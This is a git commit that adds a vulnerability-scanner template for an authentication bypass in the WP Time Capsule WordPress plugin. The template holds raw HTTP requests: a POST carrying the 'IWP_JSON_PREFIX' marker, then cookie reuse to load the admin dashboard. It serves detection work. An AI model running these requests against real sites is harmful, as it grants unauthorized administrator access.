Create wordpress-auth-bypass-wptimecapsule.yaml

2021-03-10 12:29:08 +05:30 · 2021-03-10 12:29:08 +05:30 · ce919375eb
parent 1c94e7bc22
commit ce919375eb
1 changed files with 49 additions and 0 deletions
--- a/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
+++ b/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
@ -0,0 +1,49 @@
+id: wordpress-auth-bypass-wptimecapsule
+
+info:
+  name: WordPress WP Time Capsule Authentication Bypass
+  author: princechaddha
+  severity: critical
+  reference: https://github.com/SECFORCE/WPTimeCapsulePOC
+  tags: wordpress,auth-bypass,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept: */*
+
+        IWP_JSON_PREFIX
+        
+      - |
+        GET /wp-admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept: */*
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
+          - "<h1>Dashboard</h1>"
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - 'text/html'
+        part: header
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex: